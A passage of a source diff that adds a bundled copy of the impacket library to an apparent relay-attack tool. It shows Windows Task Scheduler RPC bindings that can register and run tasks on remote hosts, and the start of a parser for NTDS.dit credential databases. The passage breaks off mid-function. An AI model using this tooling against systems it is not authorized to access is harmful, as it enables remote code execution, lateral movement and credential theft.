+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+class SchRpcSetSecurity(NDRCALL):
+    opnum = 4
+    structure = (
+        ('path', WSTR),
+        ('sddl', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcSetSecurityResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.6 SchRpcGetSecurity (Opnum 5)
+class SchRpcGetSecurity(NDRCALL):
+    opnum = 5
+    structure = (
+        ('path', WSTR),
+        ('securityInformation', DWORD),
+    )
+
+class SchRpcGetSecurityResponse(NDRCALL):
+    structure = (
+        ('sddl',LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+class SchRpcEnumFolders(NDRCALL):
+    opnum = 6
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcEnumFoldersResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.8 SchRpcEnumTasks (Opnum 7)
+class SchRpcEnumTasks(NDRCALL):
+    opnum = 7
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcEnumTasksResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.9 SchRpcEnumInstances (Opnum 8)
+class SchRpcEnumInstances(NDRCALL):
+    opnum = 8
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcEnumInstancesResponse(NDRCALL):
+    structure = (
+        ('pcGuids', DWORD),
+        ('pGuids', PGUID_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.10 SchRpcGetInstanceInfo (Opnum 9)
+class SchRpcGetInstanceInfo(NDRCALL):
+    opnum = 9
+    structure = (
+        ('guid', GUID),
+    )
+
+class SchRpcGetInstanceInfoResponse(NDRCALL):
+    structure = (
+        ('pPath', LPWSTR),
+        ('pState', DWORD),
+        ('pCurrentAction', LPWSTR),
+        ('pInfo', LPWSTR),
+        ('pcGroupInstances', DWORD),
+        ('pGroupInstances', PGUID_ARRAY),
+        ('pEnginePID', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.11 SchRpcStopInstance (Opnum 10)
+class SchRpcStopInstance(NDRCALL):
+    opnum = 10
+    structure = (
+        ('guid', GUID),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopInstanceResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.12 SchRpcStop (Opnum 11)
+class SchRpcStop(NDRCALL):
+    opnum = 11
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SchRpcRun(NDRCALL):
+    opnum = 12
+    structure = (
+        ('path', WSTR),
+        ('cArgs', DWORD),
+        ('pArgs', PWSTR_ARRAY),
+        ('flags', DWORD),
+        ('sessionId', DWORD),
+        ('user', LPWSTR),
+    )
+
+class SchRpcRunResponse(NDRCALL):
+    structure = (
+        ('pGuid', GUID),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.14 SchRpcDelete (Opnum 13)
+class SchRpcDelete(NDRCALL):
+    opnum = 13
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcDeleteResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.15 SchRpcRename (Opnum 14)
+class SchRpcRename(NDRCALL):
+    opnum = 14
+    structure = (
+        ('path', WSTR),
+        ('newName', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcRenameResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.16 SchRpcScheduledRuntimes (Opnum 15)
+class SchRpcScheduledRuntimes(NDRCALL):
+    opnum = 15
+    structure = (
+        ('path', WSTR),
+        ('start', PSYSTEMTIME),
+        ('end', PSYSTEMTIME),
+        ('flags', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcScheduledRuntimesResponse(NDRCALL):
+    structure = (
+        ('pcRuntimes',DWORD),
+        ('pRuntimes',PSYSTEMTIME_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.17 SchRpcGetLastRunInfo (Opnum 16)
+class SchRpcGetLastRunInfo(NDRCALL):
+    opnum = 16
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetLastRunInfoResponse(NDRCALL):
+    structure = (
+        ('pLastRuntime',SYSTEMTIME),
+        ('pLastReturnCode',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+class SchRpcGetTaskInfo(NDRCALL):
+    opnum = 17
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcGetTaskInfoResponse(NDRCALL):
+    structure = (
+        ('pEnabled',DWORD),
+        ('pState',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.19 SchRpcGetNumberOfMissedRuns (Opnum 18)
+class SchRpcGetNumberOfMissedRuns(NDRCALL):
+    opnum = 18
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetNumberOfMissedRunsResponse(NDRCALL):
+    structure = (
+        ('pNumberOfMissedRuns',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.20 SchRpcEnableTask (Opnum 19)
+class SchRpcEnableTask(NDRCALL):
+    opnum = 19
+    structure = (
+        ('path', WSTR),
+        ('enabled', DWORD),
+    )
+
+class SchRpcEnableTaskResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SchRpcHighestVersion,SchRpcHighestVersionResponse ),
+ 1 : (SchRpcRegisterTask,SchRpcRegisterTaskResponse ),
+ 2 : (SchRpcRetrieveTask,SchRpcRetrieveTaskResponse ),
+ 3 : (SchRpcCreateFolder,SchRpcCreateFolderResponse ),
+ 4 : (SchRpcSetSecurity,SchRpcSetSecurityResponse ),
+ 5 : (SchRpcGetSecurity,SchRpcGetSecurityResponse ),
+ 6 : (SchRpcEnumFolders,SchRpcEnumFoldersResponse ),
+ 7 : (SchRpcEnumTasks,SchRpcEnumTasksResponse ),
+ 8 : (SchRpcEnumInstances,SchRpcEnumInstancesResponse ),
+ 9 : (SchRpcGetInstanceInfo,SchRpcGetInstanceInfoResponse ),
+ 10 : (SchRpcStopInstance,SchRpcStopInstanceResponse ),
+ 11 : (SchRpcStop,SchRpcStopResponse ),
+ 12 : (SchRpcRun,SchRpcRunResponse ),
+ 13 : (SchRpcDelete,SchRpcDeleteResponse ),
+ 14 : (SchRpcRename,SchRpcRenameResponse ),
+ 15 : (SchRpcScheduledRuntimes,SchRpcScheduledRuntimesResponse ),
+ 16 : (SchRpcGetLastRunInfo,SchRpcGetLastRunInfoResponse ),
+ 17 : (SchRpcGetTaskInfo,SchRpcGetTaskInfoResponse ),
+ 18 : (SchRpcGetNumberOfMissedRuns,SchRpcGetNumberOfMissedRunsResponse),
+ 19 : (SchRpcEnableTask,SchRpcEnableTaskResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSchRpcHighestVersion(dce):
+    return dce.request(SchRpcHighestVersion())
+
+def hSchRpcRegisterTask(dce, path, xml, flags, sddl, logonType, pCreds = ()):
+    request = SchRpcRegisterTask()
+    request['path'] = checkNullString(path)
+    request['xml'] = checkNullString(xml)
+    request['flags'] = flags
+    request['sddl'] = sddl
+    request['logonType'] = logonType
+    request['cCreds'] = len(pCreds)
+    if len(pCreds) == 0:
+        request['pCreds'] = NULL
+    else:
+        for cred in pCreds:
+            request['pCreds'].append(cred)
+    return dce.request(request)
+
+def hSchRpcRetrieveTask(dce, path, lpcwszLanguagesBuffer = '\x00', pulNumLanguages=0 ):
+    schRpcRetrieveTask = SchRpcRetrieveTask()
+    schRpcRetrieveTask['path'] = checkNullString(path)
+    schRpcRetrieveTask['lpcwszLanguagesBuffer'] = lpcwszLanguagesBuffer
+    schRpcRetrieveTask['pulNumLanguages'] = pulNumLanguages
+    return dce.request(schRpcRetrieveTask)
+
+def hSchRpcCreateFolder(dce, path, sddl = NULL):
+    schRpcCreateFolder = SchRpcCreateFolder()
+    schRpcCreateFolder['path'] = checkNullString(path)
+    schRpcCreateFolder['sddl'] = sddl
+    schRpcCreateFolder['flags'] = 0
+    return dce.request(schRpcCreateFolder)
+
+def hSchRpcSetSecurity(dce, path, sddl, flags):
+    schRpcSetSecurity = SchRpcSetSecurity()
+    schRpcSetSecurity['path'] = checkNullString(path)
+    schRpcSetSecurity['sddl'] = checkNullString(sddl)
+    schRpcSetSecurity['flags'] = flags
+    return dce.request(schRpcSetSecurity)
+
+def hSchRpcGetSecurity(dce, path, securityInformation=0xffffffff):
+    schRpcGetSecurity = SchRpcGetSecurity()
+    schRpcGetSecurity['path'] = checkNullString(path)
+    schRpcGetSecurity['securityInformation'] = securityInformation
+    return dce.request(schRpcGetSecurity)
+
+def hSchRpcEnumFolders(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumFolders = SchRpcEnumFolders()
+    schRpcEnumFolders['path'] = checkNullString(path)
+    schRpcEnumFolders['flags'] = flags
+    schRpcEnumFolders['startIndex'] = startIndex
+    schRpcEnumFolders['cRequested'] = cRequested
+    return dce.request(schRpcEnumFolders)
+
+def hSchRpcEnumTasks(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumTasks = SchRpcEnumTasks()
+    schRpcEnumTasks['path'] = checkNullString(path)
+    schRpcEnumTasks['flags'] = flags
+    schRpcEnumTasks['startIndex'] = startIndex
+    schRpcEnumTasks['cRequested'] = cRequested
+    return dce.request(schRpcEnumTasks)
+
+def hSchRpcEnumInstances(dce, path, flags=TASK_ENUM_HIDDEN):
+    schRpcEnumInstances = SchRpcEnumInstances()
+    schRpcEnumInstances['path'] = checkNullString(path)
+    schRpcEnumInstances['flags'] = flags
+    return dce.request(schRpcEnumInstances)
+
+def hSchRpcGetInstanceInfo(dce, guid):
+    schRpcGetInstanceInfo = SchRpcGetInstanceInfo()
+    schRpcGetInstanceInfo['guid'] = guid
+    return dce.request(schRpcGetInstanceInfo)
+
+def hSchRpcStopInstance(dce, guid, flags = 0):
+    schRpcStopInstance = SchRpcStopInstance()
+    schRpcStopInstance['guid'] = guid
+    schRpcStopInstance['flags'] = flags
+    return dce.request(schRpcStopInstance)
+
+def hSchRpcStop(dce, path, flags = 0):
+    schRpcStop= SchRpcStop()
+    schRpcStop['path'] = checkNullString(path)
+    schRpcStop['flags'] = flags
+    return dce.request(schRpcStop)
+
+def hSchRpcRun(dce, path, pArgs=(), flags=0, sessionId=0, user = NULL):
+    schRpcRun = SchRpcRun()
+    schRpcRun['path'] = checkNullString(path)
+    schRpcRun['cArgs'] = len(pArgs)
+    for arg in pArgs:
+        argn = LPWSTR()
+        argn['Data'] = checkNullString(arg)
+        schRpcRun['pArgs'].append(argn)
+    schRpcRun['flags'] = flags
+    schRpcRun['sessionId'] = sessionId
+    schRpcRun['user'] = user
+    return dce.request(schRpcRun)
+
+def hSchRpcDelete(dce, path, flags = 0):
+    schRpcDelete = SchRpcDelete()
+    schRpcDelete['path'] = checkNullString(path)
+    schRpcDelete['flags'] = flags
+    return dce.request(schRpcDelete)
+
+def hSchRpcRename(dce, path, newName, flags = 0):
+    schRpcRename = SchRpcRename()
+    schRpcRename['path'] = checkNullString(path)
+    schRpcRename['newName'] = checkNullString(newName)
+    schRpcRename['flags'] = flags
+    return dce.request(schRpcRename)
+
+def hSchRpcScheduledRuntimes(dce, path, start = NULL, end = NULL, flags = 0, cRequested = 10):
+    schRpcScheduledRuntimes = SchRpcScheduledRuntimes()
+    schRpcScheduledRuntimes['path'] = checkNullString(path)
+    schRpcScheduledRuntimes['start'] = start
+    schRpcScheduledRuntimes['end'] = end
+    schRpcScheduledRuntimes['flags'] = flags
+    schRpcScheduledRuntimes['cRequested'] = cRequested
+    return dce.request(schRpcScheduledRuntimes)
+
+def hSchRpcGetLastRunInfo(dce, path):
+    schRpcGetLastRunInfo = SchRpcGetLastRunInfo()
+    schRpcGetLastRunInfo['path'] = checkNullString(path)
+    return dce.request(schRpcGetLastRunInfo)
+
+def hSchRpcGetTaskInfo(dce, path, flags = 0):
+    schRpcGetTaskInfo = SchRpcGetTaskInfo()
+    schRpcGetTaskInfo['path'] = checkNullString(path)
+    schRpcGetTaskInfo['flags'] = flags
+    return dce.request(schRpcGetTaskInfo)
+
+def hSchRpcGetNumberOfMissedRuns(dce, path):
+    schRpcGetNumberOfMissedRuns = SchRpcGetNumberOfMissedRuns()
+    schRpcGetNumberOfMissedRuns['path'] = checkNullString(path)
+    return dce.request(schRpcGetNumberOfMissedRuns)
+
+def hSchRpcEnableTask(dce, path, enabled = True):
+    schRpcEnableTask = SchRpcEnableTask()
+    schRpcEnableTask['path'] = checkNullString(path)
+    if enabled is True:
+        schRpcEnableTask['enabled'] = 1
+    else:
+        schRpcEnableTask['enabled'] = 0
+    return dce.request(schRpcEnableTask)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/wkst.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/wkst.py
--- a/tools/MultiRelay/impacket-dev/impacket/dpapi.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dpapi.py
--- a/tools/MultiRelay/impacket-dev/impacket/ese.py
+++ b/tools/MultiRelay/impacket-dev/impacket/ese.py
@@ -0,0 +1,970 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#             Microsoft Extensive Storage Engine parser, just focused on trying 
+#             to parse NTDS.dit files (not meant as a full parser, although it might work)
+#
+# Author:
+#  Alberto Solino (@agsolino)
+#
+# Reference for:
+#  Structure.
+# 
+# Excellent reference done by Joachim Metz
+# http://forensic-proof.com/wp-content/uploads/2011/07/Extensible-Storage-Engine-ESE-Database-File-EDB-format.pdf
+#
+# ToDo: 
+# [ ] Parse multi-values properly
+# [ ] Support long values properly
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from collections import OrderedDict
+except:
+    try:
+        from ordereddict.ordereddict import OrderedDict
+    except:
+        from ordereddict import OrderedDict
+from impacket.structure import Structure, hexdump
+from struct import unpack
+from binascii import hexlify
+from six import b
+
+# Constants
+
+FILE_TYPE_DATABASE       = 0
+FILE_TYPE_STREAMING_FILE = 1
+
+# Database state
+JET_dbstateJustCreated    = 1
+JET_dbstateDirtyShutdown  = 2
+JET_dbstateCleanShutdown  = 3
+JET_dbstateBeingConverted = 4
+JET_dbstateForceDetach    = 5
+
+# Page Flags
+FLAGS_ROOT         = 1
+FLAGS_LEAF         = 2
+FLAGS_PARENT       = 4
+FLAGS_EMPTY        = 8
+FLAGS_SPACE_TREE   = 0x20
+FLAGS_INDEX        = 0x40
+FLAGS_LONG_VALUE   = 0x80
+FLAGS_NEW_FORMAT   = 0x2000
+FLAGS_NEW_CHECKSUM = 0x2000
+
+# Tag Flags
+TAG_UNKNOWN = 0x1
+TAG_DEFUNCT = 0x2
+TAG_COMMON  = 0x4
+
+# Fixed Page Numbers
+DATABASE_PAGE_NUMBER           = 1
+CATALOG_PAGE_NUMBER            = 4
+CATALOG_BACKUP_PAGE_NUMBER     = 24
+
+# Fixed FatherDataPages
+DATABASE_FDP         = 1
+CATALOG_FDP          = 2
+CATALOG_BACKUP_FDP   = 3
+
+# Catalog Types
+CATALOG_TYPE_TABLE        = 1
+CATALOG_TYPE_COLUMN       = 2
+CATALOG_TYPE_INDEX        = 3
+CATALOG_TYPE_LONG_VALUE   = 4
+CATALOG_TYPE_CALLBACK     = 5
+
+# Column Types
+JET_coltypNil          = 0
+JET_coltypBit          = 1
+JET_coltypUnsignedByte = 2
+JET_coltypShort        = 3
+JET_coltypLong         = 4
+JET_coltypCurrency     = 5
+JET_coltypIEEESingle   = 6
+JET_coltypIEEEDouble   = 7
+JET_coltypDateTime     = 8
+JET_coltypBinary       = 9
+JET_coltypText         = 10
+JET_coltypLongBinary   = 11
+JET_coltypLongText     = 12
+JET_coltypSLV          = 13
+JET_coltypUnsignedLong = 14
+JET_coltypLongLong     = 15
+JET_coltypGUID         = 16
+JET_coltypUnsignedShort= 17
+JET_coltypMax          = 18
+
+ColumnTypeToName = {
+    JET_coltypNil          : 'NULL',
+    JET_coltypBit          : 'Boolean',
+    JET_coltypUnsignedByte : 'Signed byte',
+    JET_coltypShort        : 'Signed short',
+    JET_coltypLong         : 'Signed long',
+    JET_coltypCurrency     : 'Currency',
+    JET_coltypIEEESingle   : 'Single precision FP',
+    JET_coltypIEEEDouble   : 'Double precision FP',
+    JET_coltypDateTime     : 'DateTime',
+    JET_coltypBinary       : 'Binary',
+    JET_coltypText         : 'Text',
+    JET_coltypLongBinary   : 'Long Binary',
+    JET_coltypLongText     : 'Long Text',
+    JET_coltypSLV          : 'Obsolete',
+    JET_coltypUnsignedLong : 'Unsigned long',
+    JET_coltypLongLong     : 'Long long',
+    JET_coltypGUID         : 'GUID',
+    JET_coltypUnsignedShort: 'Unsigned short',
+    JET_coltypMax          : 'Max',
+}
+
+ColumnTypeSize = {
+    JET_coltypNil          : None,
+    JET_coltypBit          : (1,'B'),
+    JET_coltypUnsignedByte : (1,'B'),
+    JET_coltypShort        : (2,'<h'),
+    JET_coltypLong         : (4,'<l'),
+    JET_coltypCurrency     : (8,'<Q'),
+    JET_coltypIEEESingle   : (4,'<f'),
+    JET_coltypIEEEDouble   : (8,'<d'),
+    JET_coltypDateTime     : (8,'<Q'),
+    JET_coltypBinary       : None,
+    JET_coltypText         : None, 
+    JET_coltypLongBinary   : None,
+    JET_coltypLongText     : None,
+    JET_coltypSLV          : None,
+    JET_coltypUnsignedLong : (4,'<L'),
+    JET_coltypLongLong     : (8,'<Q'),
+    JET_coltypGUID         : (16,'16s'),
+    JET_coltypUnsignedShort: (2,'<H'),
+    JET_coltypMax          : None,
+}
+
+# Tagged Data Type Flags
+TAGGED_DATA_TYPE_VARIABLE_SIZE = 1
+TAGGED_DATA_TYPE_COMPRESSED    = 2
+TAGGED_DATA_TYPE_STORED        = 4
+TAGGED_DATA_TYPE_MULTI_VALUE   = 8
+TAGGED_DATA_TYPE_WHO_KNOWS     = 10
+
+# Code pages
+CODEPAGE_UNICODE = 1200
+CODEPAGE_ASCII   = 20127
+CODEPAGE_WESTERN = 1252
+
+StringCodePages = {
+    CODEPAGE_UNICODE : 'utf-16le', 
+    CODEPAGE_ASCII   : 'ascii',
+    CODEPAGE_WESTERN : 'cp1252',
+}
+
+# Structures
+
+TABLE_CURSOR = {
+    'TableData' : b'',
+    'FatherDataPageNumber': 0,
+    'CurrentPageData' : b'',
+    'CurrentTag' : 0,
+}
+
+class ESENT_JET_SIGNATURE(Structure):
+    structure = (
+        ('Random','<L=0'),
+        ('CreationTime','<Q=0'),
+        ('NetBiosName','16s=b""'),
+    )
+
+class ESENT_DB_HEADER(Structure):
+    structure = (
+        ('CheckSum','<L=0'),
+        ('Signature','"\xef\xcd\xab\x89'),
+        ('Version','<L=0'),
+        ('FileType','<L=0'),
+        ('DBTime','<Q=0'),
+        ('DBSignature',':',ESENT_JET_SIGNATURE),
+        ('DBState','<L=0'),
+        ('ConsistentPosition','<Q=0'),
+        ('ConsistentTime','<Q=0'),
+        ('AttachTime','<Q=0'),
+        ('AttachPosition','<Q=0'),
+        ('DetachTime','<Q=0'),
+        ('DetachPosition','<Q=0'),
+        ('LogSignature',':',ESENT_JET_SIGNATURE),
+        ('Unknown','<L=0'),
+        ('PreviousBackup','24s=b""'),
+        ('PreviousIncBackup','24s=b""'),
+        ('CurrentFullBackup','24s=b""'),
+        ('ShadowingDisables','<L=0'),
+        ('LastObjectID','<L=0'),
+        ('WindowsMajorVersion','<L=0'),
+        ('WindowsMinorVersion','<L=0'),
+        ('WindowsBuildNumber','<L=0'),
+        ('WindowsServicePackNumber','<L=0'),
+        ('FileFormatRevision','<L=0'),
+        ('PageSize','<L=0'),
+        ('RepairCount','<L=0'),
+        ('RepairTime','<Q=0'),
+        ('Unknown2','28s=b""'),
+        ('ScrubTime','<Q=0'),
+        ('RequiredLog','<Q=0'),
+        ('UpgradeExchangeFormat','<L=0'),
+        ('UpgradeFreePages','<L=0'),
+        ('UpgradeSpaceMapPages','<L=0'),
+        ('CurrentShadowBackup','24s=b""'),
+        ('CreationFileFormatVersion','<L=0'),
+        ('CreationFileFormatRevision','<L=0'),
+        ('Unknown3','16s=b""'),
+        ('OldRepairCount','<L=0'),
+        ('ECCCount','<L=0'),
+        ('LastECCTime','<Q=0'),
+        ('OldECCFixSuccessCount','<L=0'),
+        ('ECCFixErrorCount','<L=0'),
+        ('LastECCFixErrorTime','<Q=0'),
+        ('OldECCFixErrorCount','<L=0'),
+        ('BadCheckSumErrorCount','<L=0'),
+        ('LastBadCheckSumTime','<Q=0'),
+        ('OldCheckSumErrorCount','<L=0'),
+        ('CommittedLog','<L=0'),
+        ('PreviousShadowCopy','24s=b""'),
+        ('PreviousDifferentialBackup','24s=b""'),
+        ('Unknown4','40s=b""'),
+        ('NLSMajorVersion','<L=0'),
+        ('NLSMinorVersion','<L=0'),
+        ('Unknown5','148s=b""'),
+        ('UnknownFlags','<L=0'),
+    )
+
+class ESENT_PAGE_HEADER(Structure):
+    structure_2003_SP0 = (
+        ('CheckSum','<L=0'),
+        ('PageNumber','<L=0'),
+    )
+    structure_0x620_0x0b = (
+        ('CheckSum','<L=0'),
+        ('ECCCheckSum','<L=0'),
+    )
+    structure_win7 = (
+        ('CheckSum','<Q=0'),
+    )
+    common = (
+        ('LastModificationTime','<Q=0'),
+        ('PreviousPageNumber','<L=0'),
+        ('NextPageNumber','<L=0'),
+        ('FatherDataPage','<L=0'),
+        ('AvailableDataSize','<H=0'),
+        ('AvailableUncommittedDataSize','<H=0'),
+        ('FirstAvailableDataOffset','<H=0'),
+        ('FirstAvailablePageTag','<H=0'),
+        ('PageFlags','<L=0'),
+    )
+    extended_win7 = (
+        ('ExtendedCheckSum1','<Q=0'),
+        ('ExtendedCheckSum2','<Q=0'),
+        ('ExtendedCheckSum3','<Q=0'),
+        ('PageNumber','<Q=0'),
+        ('Unknown','<Q=0'),
+    )
+    def __init__(self, version, revision, pageSize=8192, data=None):
+        if (version < 0x620) or (version == 0x620 and revision < 0x0b):
+            # For sure the old format
+            self.structure = self.structure_2003_SP0 + self.common
+        elif version == 0x620 and revision < 0x11:
+            # Exchange 2003 SP1 and Windows Vista and later
+            self.structure = self.structure_0x620_0x0b + self.common
+        else:
+            # Windows 7 and later
+            self.structure = self.structure_win7 + self.common
+            if pageSize > 8192:
+                self.structure += self.extended_win7
+
+        Structure.__init__(self,data)
+
+class ESENT_ROOT_HEADER(Structure):
+    structure = (
+        ('InitialNumberOfPages','<L=0'),
+        ('ParentFatherDataPage','<L=0'),
+        ('ExtentSpace','<L=0'),
+        ('SpaceTreePageNumber','<L=0'),
+    )
+
+class ESENT_BRANCH_HEADER(Structure):
+    structure = (
+        ('CommonPageKey',':'),
+    )
+
+class ESENT_BRANCH_ENTRY(Structure):
+    common = (
+        ('CommonPageKeySize','<H=0'),
+    )
+    structure = (
+        ('LocalPageKeySize','<H=0'),
+        ('_LocalPageKey','_-LocalPageKey','self["LocalPageKeySize"]'),
+        ('LocalPageKey',':'),
+        ('ChildPageNumber','<L=0'),
+    )
+    def __init__(self, flags, data=None):
+        if flags & TAG_COMMON > 0:
+            # Include the common header
+            self.structure = self.common + self.structure
+        Structure.__init__(self,data)
+
+class ESENT_LEAF_HEADER(Structure):
+    structure = (
+        ('CommonPageKey',':'),
+    )
+
+class ESENT_LEAF_ENTRY(Structure):
+    common = (
+        ('CommonPageKeySize','<H=0'),
+    )
+    structure = (
+        ('LocalPageKeySize','<H=0'),
+        ('_LocalPageKey','_-LocalPageKey','self["LocalPageKeySize"]'),
+        ('LocalPageKey',':'),
+        ('EntryData',':'),
+    )
+    def __init__(self, flags, data=None):
+        if flags & TAG_COMMON > 0:
+            # Include the common header
+            self.structure = self.common + self.structure
+        Structure.__init__(self,data)
+
+class ESENT_SPACE_TREE_HEADER(Structure):
+    structure = (
+        ('Unknown','<Q=0'),
+    )
+
+class ESENT_SPACE_TREE_ENTRY(Structure):
+    structure = (
+        ('PageKeySize','<H=0'),
+        ('LastPageNumber','<L=0'),
+        ('NumberOfPages','<L=0'),
+    )
+
+class ESENT_INDEX_ENTRY(Structure):
+    structure = (
+        ('RecordPageKey',':'),
+    )
+
+class ESENT_DATA_DEFINITION_HEADER(Structure):
+    structure = (
+        ('LastFixedSize','<B=0'),
+        ('LastVariableDataType','<B=0'),
+        ('VariableSizeOffset','<H=0'),
+    )
+
+class ESENT_CATALOG_DATA_DEFINITION_ENTRY(Structure):
+    fixed = (
+        ('FatherDataPageID','<L=0'),
+        ('Type','<H=0'),
+        ('Identifier','<L=0'),
+    )
+
+    column_stuff = (
+        ('ColumnType','<L=0'),
+        ('SpaceUsage','<L=0'),
+        ('ColumnFlags','<L=0'),
+        ('CodePage','<L=0'),
+    )
+
+    other = (
+        ('FatherDataPageNumber','<L=0'),
+    )
+
+    table_stuff = (
+        ('SpaceUsage','<L=0'),
+#        ('TableFlags','<L=0'),
+#        ('InitialNumberOfPages','<L=0'),
+    )
+
+    index_stuff = (
+        ('SpaceUsage','<L=0'),
+        ('IndexFlags','<L=0'),
+        ('Locale','<L=0'),
+    )
+
+    lv_stuff = (
+        ('SpaceUsage','<L=0'),
+#        ('LVFlags','<L=0'),
+#        ('InitialNumberOfPages','<L=0'),
+    )
+    common = (
+#        ('RootFlag','<B=0'),
+#        ('RecordOffset','<H=0'),
+#        ('LCMapFlags','<L=0'),
+#        ('KeyMost','<H=0'),
+        ('Trailing',':'),
+    )
+
+    def __init__(self,data):
+        # Depending on the type of data we'll end up building a different struct
+        dataType = unpack('<H', data[4:][:2])[0]
+        self.structure = self.fixed
+
+        if dataType == CATALOG_TYPE_TABLE:
+            self.structure += self.other + self.table_stuff
+        elif dataType == CATALOG_TYPE_COLUMN:
+            self.structure += self.column_stuff
+        elif dataType == CATALOG_TYPE_INDEX:
+            self.structure += self.other + self.index_stuff
+        elif dataType == CATALOG_TYPE_LONG_VALUE:
+            self.structure += self.other + self.lv_stuff
+        elif dataType == CATALOG_TYPE_CALLBACK:
+            raise Exception('CallBack types not supported!')
+        else:
+            LOG.error('Unknown catalog type 0x%x' % dataType)
+            self.structure = ()
+            Structure.__init__(self,data)
+
+        self.structure += self.common
+
+        Structure.__init__(self,data)
+
+
+#def pretty_print(x):
+#    if x in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ ':
+#       return x
+#    else:
+#       return '.'
+#
+#def hexdump(data):
+#    x=str(data)
+#    strLen = len(x)
+#    i = 0
+#    while i < strLen:
+#        print "%04x  " % i,
+#        for j in range(16):
+#            if i+j < strLen:
+#                print "%02X" % ord(x[i+j]),
+#
+#            else:
+#                print "  ",
+#            if j%16 == 7:
+#                print "",
+#        print " ",
+#        print ''.join(pretty_print(x) for x in x[i:i+16] )
+#        i += 16
+
+def getUnixTime(t):
+    t -= 116444736000000000
+    t //= 10000000
+    return t
+
+class ESENT_PAGE:
+    def __init__(self, db, data=None):
+        self.__DBHeader = db
+        self.data = data
+        self.record = None
+        if data is not None:
+            self.record = ESENT_PAGE_HEADER(self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision'], self.__DBHeader['PageSize'], data)
+
+    def printFlags(self):
+        flags = self.record['PageFlags']
+        if flags & FLAGS_EMPTY:
+            print("\tEmpty")
+        if flags & FLAGS_INDEX:
+            print("\tIndex")
+        if flags & FLAGS_LEAF:
+            print("\tLeaf")
+        else:
+            print("\tBranch")
+        if flags & FLAGS_LONG_VALUE:
+            print("\tLong Value")
+        if flags & FLAGS_NEW_CHECKSUM:
+            print("\tNew Checksum")
+        if flags & FLAGS_NEW_FORMAT:
+            print("\tNew Format")
+        if flags & FLAGS_PARENT:
+            print("\tParent")
+        if flags & FLAGS_ROOT:
+            print("\tRoot")
+        if flags & FLAGS_SPACE_TREE:
+            print("\tSpace Tree")
+
+    def dump(self):
+        baseOffset = len(self.record)
+        self.record.dump()
+        tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+
+        print("FLAGS: ")
+        self.printFlags()
+
+        print()
+
+        for i in range(self.record['FirstAvailablePageTag']):
+            tag = tags[-4:]
+            if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] > 11 and self.__DBHeader['PageSize'] > 8192:
+                valueSize = unpack('<H', tag[:2])[0] & 0x7fff
+                valueOffset = unpack('<H',tag[2:])[0] & 0x7fff
